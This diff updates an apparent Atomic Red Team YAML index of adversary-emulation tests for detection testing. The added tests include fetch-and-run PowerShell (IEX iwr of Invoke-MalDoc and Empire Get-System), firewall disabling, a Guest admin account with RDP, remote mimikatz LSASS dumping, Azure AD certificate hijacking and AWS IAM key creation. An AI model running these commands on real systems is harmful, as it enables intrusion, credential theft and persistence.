@@ -21312,6 +21809,10 @@ defense-evasion:
          description: Specify the guest password
          type: String
          default: Password123!
+        remove_rdp_access_during_cleanup:
+          description: Set to 1 if you want the cleanup to remove RDP access to machine
+          type: Integer
+          default: 0
      executor:
        command: |-
          net user #{guest_user} /active:yes
@@ -21324,8 +21825,9 @@ defense-evasion:
          net user #{guest_user} /active:no >nul 2>&1
          net localgroup administrators #{guest_user} /delete >nul 2>&1
          net localgroup "Remote Desktop Users" #{guest_user} /delete >nul 2>&1
-          reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1
-          reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1
+          if #{remove_rdp_access_during_cleanup} NEQ 1 (echo Note: set remove_rdp_access_during_cleanup input argument to disable RDP access during cleanup)
+          if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1)
+          if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1)
        name: command_prompt
        elevation_required: true
  T1578.003:
@@ -22041,6 +22543,23 @@ defense-evasion:
 '
        cleanup_command: 'netsh advfirewall set currentprofile state on >nul 2>&1

+'
+        name: command_prompt
+    - name: Disable Microsoft Defender Firewall via Registry
+      auto_generated_guid: afedc8c4-038c-4d82-b3e5-623a95f8a612
+      description: |
+        Disables the Microsoft Defender Firewall for the public profile via registry
+        Caution if you access remotely the host where the test runs! Especially with the cleanup command which will re-enable firewall for the current profile...
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile"
+          /v "EnableFirewall" /t REG_DWORD /d 0 /f
+
+'
+        cleanup_command: 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile"
+          /v "EnableFirewall" /t REG_DWORD /d 1 /f
+
 '
        name: command_prompt
    - name: Allow SMB and RDP on Microsoft Defender Firewall
@@ -24917,13 +25436,14 @@ defense-evasion:
        command: |
          $macro = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1564\src\T1564-macrocode.txt")
          $macro = $macro -replace "aREPLACEMEa", "PathToAtomicsFolder\T1564\bin\extractme.bin"
-          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
          Invoke-Maldoc -macroCode "$macro" -officeProduct "Word" -sub "Extract" -NoWrap
        cleanup_command: 'Remove-Item "$env:TEMP\extracted.exe" -ErrorAction Ignore

 '
        name: powershell
-    - name: Create a user called "$" as noted here
+    - name: Create a Hidden User Called "$"
      auto_generated_guid: 2ec63cc2-4975-41a6-bf09-dffdfb610778
      description: Creating a user with a username containing "$"
      supported_platforms:
@@ -27068,7 +27588,78 @@ defense-evasion:
      x_mitre_version: '1.0'
      x_mitre_defense_bypassed:
      - Anti-virus, Application control
-    atomic_tests: []
+      identifier: T1553.005
+    atomic_tests:
+    - name: Mount ISO image
+      auto_generated_guid: 002cca30-4778-4891-878a-aaffcfa502fa
+      description: 'Mounts ISO image downloaded from internet to evade Mark-of-the-Web.
+        Upon successful execution, powershell will download the .iso from the Atomic
+        Red Team repo, and mount the image. The provided sample ISO simply has a Reports
+        shortcut file in it. Reference: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        path_of_iso:
+          description: Path to ISO file
+          type: path
+          default: PathToAtomicsFolder\T1553.005\bin\T1553.005.iso
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'T1553.005.iso must exist on disk at specified location (#{path_of_iso})
+
+'
+        prereq_command: 'if (Test-Path #{path_of_iso}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/T1553.005.iso -OutFile "#{path_of_iso}"
+      executor:
+        command: 'Mount-DiskImage -ImagePath "#{path_of_iso}"
+
+'
+        cleanup_command: 'Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null
+
+'
+        name: powershell
+    - name: Mount an ISO image and run executable from the ISO
+      auto_generated_guid: 42f22b00-0242-4afc-a61b-0da05041f9cc
+      description: "Mounts an ISO image downloaded from internet to evade Mark-of-the-Web
+        and run hello.exe executable from the ISO. \nUpon successful execution, powershell
+        will download the .iso from the Atomic Red Team repo, mount the image, and
+        run the executable from the ISO image that will open command prompt echoing
+        \"Hello, World!\". \nISO provided by:https://twitter.com/mattifestation/status/1398323532988399620
+        Reference:https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/,
+        \ "
+      supported_platforms:
+      - windows
+      input_arguments:
+        path_of_iso:
+          description: Path to ISO file
+          type: path
+          default: PathToAtomicsFolder\T1553.005\bin\FeelTheBurn.iso
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'FeelTheBurn.iso must exist on disk at specified location (#{path_of_iso})
+
+'
+        prereq_command: 'if (Test-Path #{path_of_iso}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/FeelTheBurn.iso -OutFile "#{path_of_iso}"
+      executor:
+        command: |
+          $keep = Mount-DiskImage -ImagePath "#{path_of_iso}" -StorageType ISO -Access ReadOnly
+          $driveLetter = ($keep | Get-Volume).DriveLetter
+          invoke-item "$($driveLetter):\hello.exe"
+        cleanup_command: |
+          Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null
+          Stop-process -name "hello" -Force -ErrorAction ignore
+        name: powershell
  T1036.004:
    technique:
      external_references:
@@ -27300,7 +27891,33 @@ defense-evasion:
      x_mitre_contributors:
      - Yossi Weizman, Azure Defender Research Team
      - Vishwas Manral, McAfee
-    atomic_tests: []
+      identifier: T1036.005
+    atomic_tests:
+    - name: Execute a process from a directory masquerading as the current parent
+        directory.
+      auto_generated_guid: 812c3ab8-94b0-4698-a9bf-9420af23ce24
+      description: 'Create and execute a process from a directory masquerading as
+        the current parent directory (`...` instead of normal `..`)
+
+'
+      supported_platforms:
+      - macos
+      - linux
+      input_arguments:
+        test_message:
+          description: Test message to echo out to the screen
+          type: String
+          default: Hello from the Atomic Red Team test T1036.005#1
+      executor:
+        name: sh
+        elevation_required: false
+        command: |
+          mkdir $HOME/...
+          cp $(which sh) $HOME/...
+          $HOME/.../sh -c "echo #{test_message}"
+        cleanup_command: |
+          rm -f $HOME/.../sh
+          rmdir $HOME/.../
  T1556:
    technique:
      external_references:
@@ -28887,11 +29504,9 @@ defense-evasion:
          description: SMTP Server IP Address
          type: string
          default: 127.0.0.1
-      dependency_executor_name: powershell
      executor:
-        command: '"Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1027
-          Atomic Test" -Attachments PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
-          -SmtpServer #{smtp_server}"
+        command: 'Send-MailMessage -From #{sender} -To #{receiver} -Subject ''T1027_Atomic_Test''
+          -Attachments #{input_file} -SmtpServer #{smtp_server}

 '
        name: powershell
@@ -28911,9 +29526,8 @@ defense-evasion:
          description: Destination IP address
          type: string
          default: 127.0.0.1
-      dependency_executor_name: powershell
      executor:
-        command: 'Invoke-WebRequest -Uri #{ip_address} -Method POST -Body PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
+        command: 'Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file}

 '
        name: powershell
@@ -30467,7 +31081,8 @@ defense-evasion:

 '
      executor:
-        command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\"
+        command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
+          (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
          -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1055.012\\src\\T1055.012-macrocode.txt\"
          -officeProduct \"#{ms_product}\" -sub \"Exploit\"\n"
        name: powershell
@@ -30601,13 +31216,15 @@ defense-evasion:
 '
      executor:
        command: |
-          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
          Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute"
        name: powershell
    - name: Remote Process Injection in LSASS via mimikatz
      auto_generated_guid: 3203ad24-168e-4bec-be36-f79b13ef8a83
      description: |
        Use mimikatz to remotely (via psexec) dump LSASS process content for RID 500 via code injection (new thread).
+        Especially useful against domain controllers in Active Directory environments.
        It must be executed in the context of a user who is privileged on remote `machine`.

        The effect of `/inject` is explained in <https://blog.3or.de/mimikatz-deep-dive-on-lsadumplsa-patch-and-inject.html>
@@ -30637,6 +31254,7 @@ defense-evasion:
          if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
        get_prereq_command: |
          $mimikatz_path = cmd /c echo #{mimikatz_path}
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
          Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
          Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
          New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
@@ -30649,6 +31267,7 @@ defense-evasion:

 '
        get_prereq_command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
          Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
          Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
          New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null
@@ -31777,10 +32396,10 @@ defense-evasion:
      x_mitre_version: '2.0'
      identifier: T1207
    atomic_tests:
-    - name: DCShadow - Mimikatz
+    - name: DCShadow (Active Directory)
      auto_generated_guid: 0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6
      description: |
-        Use Mimikatz DCShadow method to simulate behavior of a Domain Controller and edit protected attribute.
+        Use Mimikatz DCShadow method to simulate behavior of an Active Directory Domain Controller and edit protected attribute.

        [DCShadow](https://www.dcshadow.com/)
        [Additional Reference](http://www.labofapenetrationtester.com/2018/04/dcshadow.html)
@@ -34144,30 +34763,26 @@ defense-evasion:
    atomic_tests:
    - name: WINWORD Remote Template Injection
      auto_generated_guid: 1489e08a-82c7-44ee-b769-51b72d03521d
-      description: 'Open a .docx file that loads a remote .dotm macro enabled template.
-        Executes the code specified within the .dotm template.Requires download of
-        WINWORD found in Microsoft Ofiice at Microsoft: https://www.microsoft.com/en-us/download/office.aspx.  Opens
-        Calculator.exe when test sucessfully executed, while AV turned off.
-
-'
+      description: "Open a .docx file that loads a remote .dotm macro enabled template
+        from https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm
+        \nExecutes the code specified within the .dotm template.\nRequires download
+        of WINWORD found in Microsoft Ofiice at Microsoft: https://www.microsoft.com/en-us/download/office.aspx.
+        \ \nDefault docs file opens Calculator.exe when test sucessfully executed,
+        while AV turned off.\n"
      supported_platforms:
      - windows
      input_arguments:
-        docx file:
+        docx_file:
          description: Location of the test docx file on the local filesystem.
          type: Path
          default: PathToAtomicsFolder\T1221\src\Calculator.docx
-        dotm template:
-          description: Location of the test dotm template on the remote server.
-          type: Path
-          default: https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm
      dependency_executor_name: powershell
      dependencies:
      - description: ''
        prereq_command: ''
        get_prereq_command: ''
      executor:
-        command: 'start PathToAtomicsFolder\T1221\src\Calculator.docx
+        command: 'start #{docx_file}

 '
        name: command_prompt
@@ -34698,8 +35313,9 @@ defense-evasion:
      supported_platforms:
      - windows
      executor:
-        command: IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1'
-          -UseBasicParsing); Get-System -Technique NamedPipe -Verbose
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique NamedPipe -Verbose
        name: powershell
        elevation_required: true
    - name: "`SeDebugPrivilege` token duplication"
@@ -34710,8 +35326,9 @@ defense-evasion:
      supported_platforms:
      - windows
      executor:
-        command: IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1'
-          -UseBasicParsing); Get-System -Technique Token -Verbose
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique Token -Verbose
        name: powershell
        elevation_required: true
  T1205:
@@ -36279,6 +36896,39 @@ persistence:

 '
        name: powershell
+    - name: AWS - Create a group and add a user to that group
+      auto_generated_guid: 8822c3b0-d9f9-4daf-a043-49f110a31122
+      description: 'Adversaries create AWS group, add users to specific to that group
+        to elevate their privilieges to gain more accesss
+
+'
+      supported_platforms:
+      - iaas:aws
+      input_arguments:
+        username:
+          description: Name of the AWS group to create
+          type: String
+          default: atomicredteam
+      dependencies:
+      - description: 'Check if the user exists, we can only add a user to a group
+          if the user exists.
+
+'
+        prereq_command: 'aws iam list-users | grep #{username}
+
+'
+        get_prereq_command: 'echo Please run atomic test T1136.003, before running
+          this atomic test
+
+'
+      executor:
+        command: |
+          aws iam create-group --group-name #{username}
+          aws iam add-user-to-group --user-name #{username} --group-name #{username}
+        cleanup_command: |
+          aws iam remove-user-from-group --user-name #{username} --group-name #{username}
+          aws iam delete-group --group-name #{username}
+        name: sh
  T1547.014:
    technique:
      external_references:
@@ -36532,7 +37182,195 @@ persistence:
      x_mitre_platforms:
      - IaaS
      - Azure AD
-    atomic_tests: []
+      identifier: T1098.001
+    atomic_tests:
+    - name: Azure AD Application Hijacking - Service Principal
+      auto_generated_guid: b8e747c3-bdf7-4d71-bce2-f1df2a057406
+      description: |
+        Add a certificate to an Application through its Service Principal.
+        The certificate can then be used to authenticate as the application and benefit from its rights.
+        An account with high-enough Azure AD privileges is needed, such as Global Administrator or Application Administrator. The account authentication must be without MFA.
+      supported_platforms:
+      - azure-ad
+      input_arguments:
+        username:
+          description: Azure AD username
+          type: String
+          default: jonh@contoso.com
+        password:
+          description: Azure AD password
+          type: String
+          default: p4sswd
+        service_principal_name:
+          description: Name of the targeted service principal
+          type: String
+          default: SuperSP
+        certificate_password:
+          description: Password of the new certificate
+          type: string
+          default: Passw0rd
+        path_to_cert:
+          description: Path of the new certificate, locally stored
+          type: string
+          default: "$env:TEMP"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'AzureAD module must be installed.
+
+'
+        prereq_command: 'if (Get-Module AzureAD) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: 'Install-Module -Name AzureAD -Force
+
+'
+      executor:
+        command: |
+          Import-Module -Name AzureAD
+          $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+          $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+          Connect-AzureAD -Credential $Credential
+
+          $sp = Get-AzureADServicePrincipal -Searchstring "#{service_principal_name}"
+          if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
+          # in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long
+          $certNotAfter = (Get-Date).AddDays(2)
+          $credNotAfter = (Get-Date).AddDays(1)
+          $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint
+          $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText
+          Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{service_principal_name}.pfx" -Password $pwd
+
+          $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{service_principal_name}.pfx", $pwd)
+          $keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
+
+          New-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter
+
+          Start-Sleep -s 30
+          $tenant=Get-AzureADTenantDetail
+          $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb
+          Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
+          Write-Host "End of Hijacking"
+        cleanup_command: "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString
+          -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName
+          System.Management.Automation.PSCredential -ArgumentList \"#{username}\",
+          $Pword\nConnect-AzureAD -Credential $Credential\n\n$sp = Get-AzureADServicePrincipal
+          -Searchstring \"#{service_principal_name}\"\n$credz = Get-AzureADServicePrincipalKeyCredential
+          -ObjectId $sp.ObjectId\nforeach ($cred in $credz) {\n  if ([System.Text.Encoding]::ASCII.GetString($cred.CustomKeyIdentifier)
+          -eq \"AtomicTest\") {\n    Remove-AzureADServicePrincipalKeyCredential -ObjectId
+          $sp.ObjectId -KeyId $cred.KeyId\n  }  \n}\nGet-ChildItem -Path Cert:\\CurrentUser\\My
+          | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\nrm \"#{path_to_cert}\\#{service_principal_name}.pfx\"\n"
+        name: powershell
+        elevation_required: false
+    - name: Azure AD Application Hijacking - App Registration
+      auto_generated_guid: a12b5531-acab-4618-a470-0dafb294a87a
+      description: |
+        Add a certificate to an Application through its App Registration.
+        The certificate can then be used to authenticate as the application and benefit from its rights.
+        An account with high-enough Azure AD privileges is needed, such as Global Administrator or Application Administrator. The account authentication must be without MFA.
+      supported_platforms:
+      - azure-ad
+      input_arguments:
+        username:
+          description: Azure AD username
+          type: String
+          default: jonh@contoso.com
+        password:
+          description: Azure AD password
+          type: String
+          default: p4sswd
+        application_name:
+          description: Name of the targeted application
+          type: String
+          default: SuperApp
+        certificate_password:
+          description: Password of the new certificate
+          type: string
+          default: Passw0rd
+        path_to_cert:
+          description: Path of the new certificate, locally stored
+          type: string
+          default: "$env:TEMP"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'AzureAD module must be installed.
+
+'
+        prereq_command: 'if (Get-Module AzureAD) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: 'Install-Module -Name AzureAD -Force
+
+'
+      executor:
+        command: |
+          Import-Module -Name AzureAD
+          $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+          $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+          Connect-AzureAD -Credential $Credential
+
+          $app = Get-AzureADApplication -Searchstring "#{application_name}"
+          if ($app -eq $null) { Write-Warning "Application not found"; exit }
+          $certNotAfter = (Get-Date).AddDays(2)
+          $credNotAfter = (Get-Date).AddDays(1)
+          $thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint
+          $pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText
+          Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{application_name}.pfx" -Password $pwd
+
+          $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{application_name}.pfx", $pwd)
+          $keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
+
+          New-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter
+
+          Start-Sleep -s 30
+          $tenant=Get-AzureADTenantDetail
+          $auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb
+          Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
+          Write-Host "End of Hijacking"
+        cleanup_command: "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString
+          -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName
+          System.Management.Automation.PSCredential -ArgumentList \"#{username}\",
+          $Pword\nConnect-AzureAD -Credential $Credential\n\n$app = Get-AzureADApplication
+          -Searchstring \"#{application_name}\"\n$credz = Get-AzureADApplicationKeyCredential
+          -ObjectId $app.ObjectId\nforeach ($cred in $credz) {\n  if ([System.Text.Encoding]::ASCII.GetString($cred.CustomKeyIdentifier)
+          -eq \"AtomicTest\") {\n    Remove-AzureADApplicationKeyCredential -ObjectId
+          $app.ObjectId -KeyId $cred.KeyId\n  }  \n}\nGet-ChildItem -Path Cert:\\CurrentUser\\My
+          | where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\nrm \"#{path_to_cert}\\#{application_name}.pfx\"\n"
+        name: powershell
+        elevation_required: false
+    - name: AWS - Create Access Key and Secret Key
+      auto_generated_guid: 8822c3b0-d9f9-4daf-a043-491160a31122
+      description: 'Adversaries create their own new access and secret keys to programatically
+        interact with AWS environment, which is already compromised
+
+'
+      supported_platforms:
+      - iaas:aws
+      input_arguments:
+        username:
+          description: Create new AWS access and secret keys for the user
+          type: String
+          default: atomicredteam
+      dependencies:
+      - description: 'Check if the user exists.
+
+'
+        prereq_command: 'aws iam list-users | grep #{username}
+
+'
+        get_prereq_command: 'echo Please run atomic test T1136.003, before running
+          this atomic
+
+'
+      executor:
+        command: |
+          aws iam create-access-key --user-name #{username} > $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds
+          cd $PathToAtomicsFolder/T1098.001/bin/
+          ./aws_secret.sh
+        cleanup_command: |
+          access_key=`cat $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds| jq -r '.AccessKey.AccessKeyId'`
+          aws iam delete-access-key --access-key-id $access_key --user-name #{username}
+          rm $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds
+        name: sh
  T1546.009:
    technique:
      external_references:
@@ -36699,7 +37537,8 @@ persistence:
        computer starts up various applications and may in fact drive you crazy. A
        reliable way to make the message box appear and verify the \nAppInit Dlls
        are loading is to start the notepad application. Be sure to run the cleanup
-        commands afterwards so you don't keep getting message boxes showing up\n"
+        commands afterwards so you don't keep getting message boxes showing up.\n\nNote:
+        If secure boot is enabled, this technique will not work. https://docs.microsoft.com/en-us/windows/win32/dlls/secure-boot-and-appinit-dlls\n"
      supported_platforms:
      - windows
      input_arguments:
@@ -37332,7 +38171,7 @@ persistence:
        command: |
          bitsadmin.exe /create #{bits_job_name}
          bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file}
-          bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} ""
+          bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} NULL
          bitsadmin.exe /resume #{bits_job_name}
          timeout 5
          bitsadmin.exe /complete #{bits_job_name}
@@ -38102,7 +38941,43 @@ persistence:
      - Office 365
      - IaaS
      - Google Workspace
-    atomic_tests: []
+      identifier: T1136.003
+    atomic_tests:
+    - name: AWS - Create a new IAM user
+      auto_generated_guid: 8d1c2368-b503-40c9-9057-8e42f21c58ad
+      description: 'Creates a new IAM user in AWS. Upon successful creation, a new
+        user will be created. Adversaries create new IAM users so that their malicious
+        activity do not interupt the normal functions of the compromised users and
+        can remain undetected for a long time
+
+'
+      supported_platforms:
+      - iaas:aws
+      input_arguments:
+        username:
+          description: Username of the IAM user to create in AWS
+          type: String
+          default: atomicredteam
+      dependencies:
+      - description: 'Check if ~/.aws/credentials file has a default stanza is configured
+
+'
+        prereq_command: 'cat ~/.aws/credentials | grep "default"
+
+'
+        get_prereq_command: 'echo Please install the aws-cli and configure your AWS
+          defult profile using: aws configure
+
+'
+      executor:
+        command: 'aws iam create-user --user-name #{username}
+
+'
+        cleanup_command: 'aws iam delete-user --user-name #{username}
+
+'
+        name: sh
+        elevation_required: false
  T1078.004:
    technique:
      id: attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65
@@ -38961,9 +39836,9 @@ persistence:
    atomic_tests:
    - name: Enable Guest account with RDP capability and admin priviliges
      auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0
-      description: After execution the Default Guest account will be enabled (Active)
-        and added to Administrators and Remote Desktop Users Group, and desktop will
-        allow multiple RDP connections
+      description: |
+        After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group,
+        and desktop will allow multiple RDP connections.
      supported_platforms:
      - windows
      input_arguments:
@@ -38975,6 +39850,10 @@ persistence:
          description: Specify the guest password
          type: String
          default: Password123!
+        remove_rdp_access_during_cleanup:
+          description: Set to 1 if you want the cleanup to remove RDP access to machine
+          type: Integer
+          default: 0
      executor:
        command: |-
          net user #{guest_user} /active:yes
@@ -38987,8 +39866,9 @@ persistence:
          net user #{guest_user} /active:no >nul 2>&1
          net localgroup administrators #{guest_user} /delete >nul 2>&1
          net localgroup "Remote Desktop Users" #{guest_user} /delete >nul 2>&1
-          reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1
-          reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1
+          if #{remove_rdp_access_during_cleanup} NEQ 1 (echo Note: set remove_rdp_access_during_cleanup input argument to disable RDP access during cleanup)
+          if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1)
+          if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1)
        name: command_prompt
        elevation_required: true
  T1136.002:
@@ -39122,7 +40002,7 @@ persistence:
          $User.DisplayName = $SamAccountName
          $User.Save()
          $User
-        cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain
+        cleanup_command: 'cmd /c "net user #{username} /del >nul 2>&1"

 '
        name: powershell
@@ -40730,7 +41610,7 @@ persistence:
        command: |
          sudo cp #{path_malicious_plist} /Library/LaunchDaemons/#{plist_filename}
          sudo launchctl load -w /Library/LaunchDaemons/#{plist_filename}
-        cleanup: |
+        cleanup_command: |
          sudo launchctl unload /Library/LaunchDaemons/#{plist_filename}
          sudo rm /Library/LaunchDaemons/#{plist_filename}
  T1053.004:
@@ -41567,11 +42447,11 @@ persistence:
      - windows
      executor:
        command: |
-          reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /t REG_DWORD /d 4
-          if not exist  %APPDATA%\Microsoft\Outlook ( md %APPDATA%\Microsoft\Outlook\ )
+          reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level" /t REG_DWORD /d 1 /f
+          mkdir  %APPDATA%\Microsoft\Outlook\ >nul 2>&1
          echo "Atomic Red Team TEST" > %APPDATA%\Microsoft\Outlook\VbaProject.OTM
        cleanup_command: |
-          reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /f
+          reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level" /f
          del %APPDATA%\Microsoft\Outlook\VbaProject.OTM
        name: command_prompt
  T1137.001:
@@ -42988,6 +43868,48 @@ persistence:
 '
        elevation_required: true
        name: bash
+    - name: rc.common
+      auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a
+      description: 'Modify rc.common
+
+'
+      supported_platforms:
+      - linux
+      executor:
+        name: bash
+        elevation_required: true
+        command: |
+          filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi
